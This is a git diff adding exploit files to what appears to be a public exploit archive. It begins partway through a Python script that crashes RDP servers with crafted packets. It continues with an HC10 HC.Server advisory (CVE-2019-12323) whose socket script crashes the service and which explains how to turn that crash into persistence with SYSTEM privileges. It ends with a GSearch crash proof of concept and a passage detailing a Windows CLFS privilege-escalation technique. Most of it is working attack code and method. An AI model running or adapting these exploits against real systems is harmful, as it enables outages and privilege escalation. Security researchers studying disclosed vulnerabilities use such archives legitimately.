+	size3 = struct.pack(">h", len(p)-118)
+	size4 = struct.pack(">h", len(p)-132)
+	size5 = struct.pack(">h", len(p)-390)
+	ba = bytearray()
+	ba.extend(map(ord, p))
+	ba[2] = size0[0]
+	ba[3] = size0[1]
+	ba[10] = size1[0]
+	ba[11] = size1[1]
+	ba[107] = size2[0]
+	ba[108] = size2[1]
+	ba[116] = 0x81
+	ba[117] = size3[1] 
+	ba[130] = 0x81
+	ba[131] = size4[1]
+	ba[392] = size5[1]
+	tls.sendall(bytes(ba))
+	tls.recv(8192)
+
+def send_client_info(tls):
+	p = b"\x03\x00\x01\x61\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x81\x52\x40\x00\xa1\xa5\x09\x04\x09\x04\xbb\x47\x03\x00\x00\x00\x0e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x41\x41\x41\x00\x38\x00\x2e\x00\x32\x00\x33\x00\x32\x00\x2e\x00\x31\x00\x00\x00\x40\x00\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x41\x41\x41\x00\x57\x00\x53\x00\x5c\x00\x73\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00\xa4\x01\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\xff\xff\xff\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x64\x00\x00\x00"
+	tls.sendall(p)
+
+def send_channel_packets(tls):
+	p1 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00"
+	tls.sendall(p1)
+	p2 = b"\x03\x00\x00\x08\x02\xf0\x80\x28"
+	tls.sendall(p2)
+	tls.recv(1024)
+	p4 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xeb"
+	tls.sendall(p4)
+	tls.recv(1024)
+	p5 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xec"
+	tls.sendall(p5)
+	tls.recv(1024)
+	p6 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xed"
+	tls.sendall(p6)
+	tls.recv(1024)
+	p7 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xee"
+	tls.sendall(p7)
+	tls.recv(1024)
+	p8 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xef"
+	tls.sendall(p8)
+	tls.recv(1024)
+
+def send_confirm_active(tls, shareid):
+	p = "\x03\x00\x02\x63\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x82\x54\x54\x02\x13\x00\xf0\x03\xea\x03\x01\x00\xea\x03\x06\x00\x3e\x02\x4d\x53\x54\x53\x43\x00\x17\x00\x00\x00\x01\x00\x18\x00\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00\x01\x00\x00\x1a\x01\x00\x00\x00\x03\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x08\x00\x06\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x0c\x00\x00\x00\x00\x00\x02\x00\x02\x00\x08\x00\x0a\x00\x01\x00\x14\x00\x15\x00\x09\x00\x08\x00\x00\x00\x00\x00\x0d\x00\x58\x00\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x08\x00\x01\x00\x00\x00\x0e\x00\x08\x00\x01\x00\x00\x00\x10\x00\x34\x00\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00\x0f\x00\x08\x00\x01\x00\x00\x00\x11\x00\x0c\x00\x01\x00\x00\x00\x00\x28\x64\x00\x14\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x15\x00\x0c\x00\x02\x00\x00\x00\x00\x0a\x00\x01\x1a\x00\x08\x00\xaf\x94\x00\x00\x1c\x00\x0c\x00\x12\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x06\x00\x01\x00\x1e\x00\x08\x00\x01\x00\x00\x00\x18\x00\x0b\x00\x02\x00\x00\x00\x03\x0c\x00\x1d\x00\x5f\x00\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"
+	ba = bytearray()
+	ba.extend(map(ord, p))
+	tls.sendall(bytes(ba))
+
+def send_establish_session(tls):
+	p = b"\x03\x00\x00\x24\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x16\x16\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x08\x00\x1f\x00\x00\x00\x01\x00\xea\x03"
+	tls.sendall(p)
+	p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"
+	tls.sendall(p)
+	p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
+	tls.sendall(p)
+	p = b"\x03\x00\x05\x81\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x85\x72\x72\x05\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x02\x00\x00\x00\xa3\xce\x20\x35\xdb\x94\xa5\xe6\x0d\xa3\x8c\xfb\x64\xb7\x63\xca\xe7\x9a\x84\xc1\x0d\x67\xb7\x91\x76\x71\x21\xf9\x67\x96\xc0\xa2\x77\x5a\xd8\xb2\x74\x4f\x30\x35\x2b\xe7\xb0\xd2\xfd\x81\x90\x1a\x8f\xd5\x5e\xee\x5a\x6d\xcb\xea\x2f\xa5\x2b\x06\xe9\x0b\x0b\xa6\xad\x01\x2f\x7a\x0b\x7c\xff\x89\xd3\xa3\xe1\xf8\x00\x96\xa6\x8d\x9a\x42\xfc\xab\x14\x05\x8f\x16\xde\xc8\x05\xba\xa0\xa8\xed\x30\xd8\x67\x82\xd7\x9f\x84\xc3\x38\x27\xda\x61\xe3\xa8\xc3\x65\xe6\xec\x0c\xf6\x36\x24\xb2\x0b\xa6\x17\x1f\x46\x30\x16\xc7\x73\x60\x14\xb5\xf1\x3a\x3c\x95\x7d\x7d\x2f\x74\x7e\x56\xff\x9c\xe0\x01\x32\x9d\xf2\xd9\x35\x5e\x95\x78\x2f\xd5\x15\x6c\x18\x34\x0f\x43\xd7\x2b\x97\xa9\xb4\x28\xf4\x73\x6c\x16\xdb\x43\xd7\xe5\x58\x0c\x5a\x03\xe3\x73\x58\xd7\xd9\x76\xc2\xfe\x0b\xd7\xf4\x12\x43\x1b\x70\x6d\x74\xc2\x3d\xf1\x26\x60\x58\x80\x31\x07\x0e\x85\xa3\x95\xf8\x93\x76\x99\x9f\xec\xa0\xd4\x95\x5b\x05\xfa\x4f\xdf\x77\x8a\x7c\x29\x9f\x0b\x4f\xa1\xcb\xfa\x95\x66\xba\x47\xe3\xb0\x44\xdf\x83\x03\x44\x24\xf4\x1e\xf2\xe5\xcb\xa9\x53\x04\xc2\x76\xcb\x4d\xc6\xc2\xd4\x3f\xd3\x8c\xb3\x7c\xf3\xaa\xf3\x93\xfe\x25\xbd\x32\x7d\x48\x6e\x93\x96\x68\xe5\x18\x2b\xea\x84\x25\x69\x02\xa5\x38\x65\x6f\x0f\x9f\xf6\xa1\x3a\x1d\x22\x9d\x3f\x6d\xe0\x4c\xee\x8b\x24\xf0\xdc\xff\x70\x52\xa7\x0d\xf9\x52\x8a\x1e\x33\x1a\x30\x11\x15\xd7\xf8\x95\xa9\xbb\x74\x25\x8c\xe3\xe9\x93\x07\x43\xf5\x50\x60\xf7\x96\x2e\xd3\xff\x63\xe0\xe3\x24\xf1\x10\x3d\x8e\x0f\x56\xbc\x2e\xb8\x90\x0c\xfa\x4b\x96\x68\xfe\x59\x68\x21\xd0\xff\x52\xfe\x5c\x7d\x90\xd4\x39\xbe\x47\x9d\x8e\x7a\xaf\x95\x4f\x10\xea\x7b\x7a\xd3\xca\x07\x28\x3e\x4e\x4b\x81\x0e\xf1\x5f\x1f\x8d\xbe\x06\x40\x27\x2f\x4a\x03\x80\x32\x67\x54\x2f\x93\xfd\x25\x5d\x6d\xa0\xad\x23\x45\x72\xff\xd1\xeb\x5b\x51\x75\xa7\x61\xe0\x3f\xe4\xef\xf4\x96\xcd\xa5\x13\x8a\xe6\x52\x74\x70\xbf\xc1\xf9\xfb\x68\x9e\xdd\x72\x8f\xb4\x44\x5f\x3a\xcb\x75\x2a\x20\xa6\x69\xd2\x76\xf9\x57\x46\x2b\x5b\xda\xba\x0f\x9b\xe0\x60\xe1\x8b\x90\x33\x41\x0a\x2d\xc5\x06\xfe\xd0\xf0\xfc\xde\x35\xd4\x1e\xaa\x76\x0b\xae\xf4\xd5\xbd\xfa\xf3\x55\xf5\xc1\x67\x65\x75\x1c\x1d\x5e\xe8\x3a\xfe\x54\x50\x23\x04\xae\x2e\x71\xc2\x76\x97\xe6\x39\xc6\xb2\x25\x87\x92\x63\x52\x61\xd1\x6c\x07\xc1\x1c\x00\x30\x0d\xa7\x2f\x55\xa3\x4f\x23\xb2\x39\xc7\x04\x6c\x97\x15\x7a\xd7\x24\x33\x91\x28\x06\xa6\xe7\xc3\x79\x5c\xae\x7f\x50\x54\xc2\x38\x1e\x90\x23\x1d\xd0\xff\x5a\x56\xd6\x12\x91\xd2\x96\xde\xcc\x62\xc8\xee\x9a\x44\x07\xc1\xec\xf7\xb6\xd9\x9c\xfe\x30\x1c\xdd\xb3\x3b\x93\x65\x3c\xb4\x80\xfb\xe3\x87\xf0\xee\x42\xd8\xcf\x08\x98\x4d\xe7\x6b\x99\x0a\x43\xed\x13\x72\x90\xa9\x67\xfd\x3c\x63\x36\xec\x55\xfa\xf6\x1f\x35\xe7\x28\xf3\x87\xa6\xce\x2e\x34\xaa\x0d\xb2\xfe\x17\x18\xa2\x0c\x4e\x5f\xf0\xd1\x98\x62\x4a\x2e\x0e\xb0\x8d\xb1\x7f\x32\x52\x8e\x87\xc9\x68\x7c\x0c\xef\xee\x88\xae\x74\x2a\x33\xff\x4b\x4d\xc5\xe5\x18\x38\x74\xc7\x28\x83\xf7\x72\x87\xfc\x79\xfb\x3e\xce\xd0\x51\x13\x2d\x7c\xb4\x58\xa2\xe6\x28\x67\x4f\xec\xa6\x81\x6c\xf7\x9a\x29\xa6\x3b\xca\xec\xb8\xa1\x27\x50\xb7\xef\xfc\x81\xbf\x5d\x86\x20\x94\xc0\x1a\x0c\x41\x50\xa9\x5e\x10\x4a\x82\xf1\x74\x1f\x78\x21\xf5\x70\x61\x24\x00\x3d\x47\x5f\xf3\x25\x80\x3c\x4b\xea\xa3\xf4\x77\xea\xa1\x42\x1a\x17\x0f\x6d\xa8\x35\x9e\x91\x26\x34\x43\x04\xc6\xc6\x5b\x21\x7d\x8c\xc7\x22\x91\x7b\x2c\x2d\x2f\xd6\x7e\xa5\x52\xa8\x08\x80\xeb\x60\xd1\x44\x09\x8e\x3c\xa1\xaa\x67\x60\x0a\x26\xc6\xb5\xc6\x79\xa6\x4f\x8b\x8c\x25\x5c\xf1\x0b\x23\xf4\xd8\xa6\x6d\xf1\x91\x78\xf9\xe5\x2a\x50\x2f\x5a\x44\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x77\x5a\xd8\xb2\x74\x4f\x30\x35\xbf\x28\xae\xd9\xa2\x98\xa5\xbc\x60\xca\xb8\x90\x4d\x20\x46\xd9\x8a\x1a\x30\x01\x8b\x38\x63\x1a\x57\x09\x51\x46\x95\x9b\xd8\x80\x0c\xb0\x77\x24\xbf\x2b\xd3\x57\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x56\x92\x38\xed\x6b\x9b\x5b\x1f\xba\x53\xa1\x0e\xf7\x75\x10\x53\x22\x4c\x0a\x75\x88\x54\x69\x3f\x3b\xf3\x18\x67\x6b\x0f\x19\xd1\x00\x25\x86\xcd\xa8\xd9\xdd\x1d\x8d\x26\x87\x54\xd9\x79\xc0\x74\x65\x90\xd7\x33\x32\xaf\xba\x9d\x5a\xd5\x6c\x7c\xa1\x47\xe1\x49\x6e\x1c\xce\x9f\x62\xaa\x26\x16\x3f\x3c\xec\x5b\x49\xe5\xc0\x60\xd4\xbe\xa7\x88\xbc\xa1\x9f\x29\x71\x8c\xeb\x69\xf8\x73\xfb\xaf\x29\xaa\x40\x1b\xe5\x92\xd2\x77\xa7\x2b\xfb\xb6\x77\xb7\x31\xfb\xdc\x1e\x63\x63\x7d\xf2\xfe\x3c\x6a\xba\x0b\x20\xcb\x9d\x64\xb8\x31\x14\xe2\x70\x07\x2c\xdf\x9c\x6f\xb5\x3a\xc4\xd5\xb5\xc9\x3e\x9a\xd7\xd5\x30\xdc\x0e\x19\x89\xc6\x08\x88\xe1\xca\x81\xa6\x28\xdd\x9c\x74\x05\x11\xe7\xe1\xcc\xbc\xc7\x76\xdd\x55\xe2\xcc\xc2\xcb\xd3\xb6\x48\x01\xdd\xff\xba\xca\x31\xab\x26\x44\x1c\xdc\x06\x01\xdf\xf2\x90\x50\xb8\x6b\x8f\xe8\x29\xf0\xba\xec\xfb\x2d\xfd\x7a\xfc\x7f\x57\xbd\xea\x90\xf7\xcf\x92\x1e\xc4\x20\xd0\xb6\x9f\xd6\xdc\xa1\x82\xa9\x6c\x5e\x3e\x83\x41\x57\x73\xe9\xe7\x5a\x3f\xda\x24\x4f\x73\x5e\xf4\xe0\x92\x24\xbd\x0b\xd0\x3c\x49\x96\xb5\xb5\x05\x32\xcb\x58\x1d\x6f\x97\x51\xee\x0c\xdc\x0b\x2a\x60\xef\x97\x3e\x5a\x30\x81\x15\x91\xcf\x11\x07\x25\x2c\x41\xdb\x70\x72\xe1\x75\xf6\xa5\xff\xe8\x44\xe7\x03\xe3\x61\xaa\xdb\xe0\x07\x3d\x07\x0b\xe3\x5c\x09\xa9\x5e\x10\xfd\xcf\x74\x9e\x23\xf1\x30\x86\x16\xef\x25\x4e\xfe\xa4\x93\xa5\x80\x0a\x01\x39\xcc\x11\x7a\x6e\x94\x22\x5b\xd8\xc6\xc9\xa8\xdf\x13\x96\xb3\x91\x33\x6e\x87\xbb\x94\x63\x2d\x88\x64\xa7\x58\x89\xda\xdc\x7f\x2a\xe3\xa1\x66\xe5\xc8\x7f\xc2\xdb\xc7\x7d\x2f\xa9\x46\x28\x45\x69\xbc\xac\x9f\x85\x9e\xb0\x9f\x9a\x49\xb4\xb1\xcb"
+	tls.sendall(p)
+	p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x03\x00\x32\x00"
+	tls.sendall(p)
+
+def send_kill_packet(tls, arch):
+	if arch == "32":
+		p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+	elif arch == "64":
+		p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+	else:
+		print("Make the second arguement '32' or '64' without quotes")
+		sys.exit()
+	tls.sendall(p)
+
+def terminate_connection(tls):
+	p = b"\x03\x00\x00\x09\x02\xf0\x80\x21\x80"
+	tls.sendall(p)
+
+def main(args):
+	tls = send_init_packets(args[1])
+
+	send_client_data(tls)
+	print("[+] ClientData Packet Sent")
+
+	send_channel_packets(tls)
+	print("[+] ChannelJoin/ErectDomain/AttachUser Sent")
+
+	send_client_info(tls)
+	print("[+] ClientInfo Packet Sent")
+
+	tls.recv(8192)
+	tls.recv(8192)
+
+	send_confirm_active(tls, None)
+	print("[+] ConfirmActive Packet Sent")
+
+	send_establish_session(tls)
+	print("[+] Session Established")
+
+	send_kill_packet(tls, args[2])
+	terminate_connection(tls)
+	print("[+] Vuln Should Trigger")
+
+if __name__ == '__main__':
+	if len(sys.argv) != 3:
+		print("Usage: python poc.py 127.0.0.1 64")
+		sys.exit()
+
+	elif sys.argv[2] == '32' or '64':
+		# I've had to send the packets 5 times for hosts that havent
+		# had a terminal session since their last reboot. I think
+		# I know why but atm its just easier to send the exchange
+		# 5 times and it'll crash eventually. Most of the time its
+		# the first time though.
+		for _ in range(5):
+			main(sys.argv)
+
+	else:
+		print("Usage: python poc.py 127.0.0.1 64")
+		sys.exit()
\ No newline at end of file
diff --git a/exploits/windows/dos/46995.txt b/exploits/windows/dos/46995.txt
new file mode 100644
index 000000000..4296a9208
--- /dev/null
+++ b/exploits/windows/dos/46995.txt
@@ -0,0 +1,134 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
+[+] ISR: ApparitionSec          
+ 
+
+
+[Vendor]
+www.hostingcontroller.com
+
+
+[Product]
+HC10 HC.Server Service 10.14
+
+HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers
+simultaneously as part of a single cluster. HC works on an N-tier user model.
+
+
+[Vulnerability Type]
+Remote Invalid Pointer Write
+
+
+[CVE Reference]
+CVE-2019-12323
+
+
+[Security Issue]
+The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794.
+In addition this can potentially be leveraged for post exploit persistence with SYSTEM privileges, if physical access or malware is involved.
+
+If a physical attacker or malware can set its own program for the service failure recovery options, it can be used to maintain persistence.
+Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn can start the attackers recovery program.
+The attackers program can then try restarting the affected service to try an stay unnoticed by calling "sc start HCServerService".
+
+Services failure flag recovery options for "enabling actions for stops or errors" and can be set in the services "Recovery" properties tab
+or on the command line. Authentication is not required to reach the vulnerable service, this was tested successfully on Windows 7/10.
+
+
+SERVICE_NAME: HCServerService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : HC Server Service
+        DEPENDENCIES       : HCProvisioningService
+        SERVICE_START_NAME : LocalSystem
+
+
+Crash Dump:
+
+INVALID_POINTER_WRITE_EXPLOITABLE
+
+CONTEXT: (.ecxr)
+rax=0000000000000bfd rbx=0000000000df94f0 rcx=03743db166a90000
+rdx=0000000080000000 rsi=00000000000000b4 rdi=0000000000000000
+rip=0000000140025b6c rsp=000000000118f570 rbp=0000000000000000
+r8=000000000000001f r9=00000000000006fe r10=0000000000000603
+r11=0000000000df0158 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0 nv up ei pl nz na pe nc
+cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
+HC_Server+0x25b6c:
+00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 ss:00000000`0119033d=??
+Resetting default scope
+
+FAULTING_IP: 
+HC_Server+25b6c
+00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0
+
+EXCEPTION_RECORD: (.exr -1)
+ExceptionAddress: 0000000140025b6c (HC_Server+0x0000000000025b6c)
+ExceptionCode: c0000005 (Access violation)
+ExceptionFlags: 00000000
+NumberParameters: 2
+Parameter[0]: 0000000000000001
+Parameter[1]: 000000000119033d
+Attempt to write to address 000000000119033d
+
+PROCESS_NAME: HC.Server.exe
+
+
+
+[Exploit/POC]
+1) Configure the HCServiceService recovery failure options to an arbitrary program.
+2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges.
+
+from socket import *
+
+IP = raw_input("[+] HC Server Service IP ")
+PORT = 8794
+
+payload = "A"*4000
+s=socket(AF_INET,SOCK_STREAM)
+s.connect((IP, PORT))
+s.send(payload)
+s.close()
+
+print "Triggering HC10 Server Service Xploit"
+print "hyp3rlinx"
+
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+Medium
+
+
+
+[Disclosure Timeline]
+Vendor Notification: May 14, 2019
+No reply
+Second notification: May 21, 2019
+Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019 
+mitre assign CVE: May 27, 2019
+Vendor : "New installer to be released June 13, 2019"
+June 16, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/dos/47026.txt b/exploits/windows/dos/47026.txt
new file mode 100644
index 000000000..f44b65d17
--- /dev/null
+++ b/exploits/windows/dos/47026.txt
@@ -0,0 +1,26 @@
+# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
+# Date: 6/23/2019
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
+# Version: 1.0.1.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# Run the python script, it will create a new file "PoC.txt"
+# Copy the text from the generated PoC.txt file to clipboard
+# Paste the text in the search bar and click search
+# Click any link and app will crash
+
+
+buffer = "A" * 2000
+payload = buffer
+try:
+    f = open("PoC.txt", "w")
+    print("[+] Creating payload..")
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created")
\ No newline at end of file
diff --git a/exploits/windows/dos/47028.txt b/exploits/windows/dos/47028.txt
new file mode 100644
index 000000000..171480565
--- /dev/null
+++ b/exploits/windows/dos/47028.txt
@@ -0,0 +1,42 @@
+Windows: CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation EoP
+Platform: Windows 10 1809 (not tested earlier)
+Class: Elevation of Privilege
+Security Boundary (per Windows Security Service Criteria): User boundary
+
+Summary: 
+
+The kernel’s CmpAddRemoveContainerToCLFSLog function doesn’t safely create new transaction log containers leading to arbitrary file creation and EoP.
+
+Description:
+
+The configuration manager in the kernel supports creating registry keys within a transaction. To store the transaction log data a CLFS log file is used which is split into multiple containers. These transaction log files are stored within the same directory as the hive files with the names ending BLF. Container files, with the suffix TxR.X.regtrans-ms are created on demand if the amount of transaction data being stored is larger than available log space. 
+
+As these container files are created within the security context of the process creating the transaction this creates a problem as the CLFS driver always creates file with the previous mode set to UserMode. This would mean a non-administrator couldn’t create transactions in any hive which is stored in a location they can’t write to, which includes any HKLM hive which wouldn’t be very useful. To solve this problem before calling ClfsAddLogContainer the kernel code attaches the calling thread to the System process and disables any impersonation token which ensures the call to CLFS will come from the SYSTEM user. 
+
+This becomes an issue for the user’s registry hives as those hive files are located in user writable locations. Therefore as the names of the containers are predictable (just using an incrementing counter) it’s possible to redirect the container file creation through abusing symbolic links. 
+
+Due to the location of the hive file it’d seem initially difficult to exploit this as a normal user as you can’t introduce a NTFS mount point in a parent path as you can’t delete/rename the existing hive files while the user is logged in. On newer versions of Windows with Developer Mode enabled you could create NTFS symbolic links but we’ve got to assume that this setting wouldn’t be enabled by default. It turns out looking at the call to IoCreateFileEx in CLFS that it doesn’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE which means it’s exploitable by abusing mount points as if it were a file level symbolic link (as documented in https://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-arbitrary.html). The file is created with the security descriptor of the original hive/transaction log which means the user can write to the created file.
+
+However this only works until 1803 which fixes this behavior and blocks reparsing from a mount point to a normal file. I’ve not investigated in depth but based on the flags set in the call in Process Monitor this “fix” works by setting the FILE_DIRECTORY_FILE in the parse context if a mount point is encountered before the driver returns STATUS_REPARSE. Ironically this behavior works in our favor, as the call is a FILE_CREATE disposition call then the file doesn’t exist anyway and by dropping a mount point named appropriately the CLFS code will create an arbitrary directory even though the code didn’t originally specify that requirement. Once CLFS realizes it’s created a directory (or at least something it can’t write to) it tries to back out and deletes the new directory, however if we’re quick we can write a file to the new directory (again as the security descriptor grants us access) which makes the delete operation fail. We can then use the directory to get system privileges, such as through abusing the DiagnosticsHub Collector Service.
+
+Funnily enough I think prior to 1803 this would be harder to exploit as the transaction logs seem to be deleted when the user logs out and it wouldn’t be possible to modify the contents of the newly created arbitrary file as it only allows read sharing. An unexpected consequence of a security mitigation it seems.
+
+Fixing wise there’s at least two things you could do. Firstly the generated name is under control of the kernel and so could be more random to prevent resource planting attacks. You could also modify CLFS to specify explicitly FILE_NON_DIRECTORY_FILE and maybe FILE_OPEN_REPARSE_POINT to prevent abuse of mount points and even symbolic links if the target is an NTFS symbolic link.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It will use the vulnerability to create an arbitrary directory (on 1809 at least). Note that you’re likely to need at least two CPUs for the exploit to be successful as it requires winning the race between the directory being created and then being deleted. Note that if you get an error stating the transaction log file was full then it failed to capture the directory. Try running the PoC again as it should be possible to run it multiple times without significant consequence (although the transaction functionality of the user’s registry _might_ be broken).
+
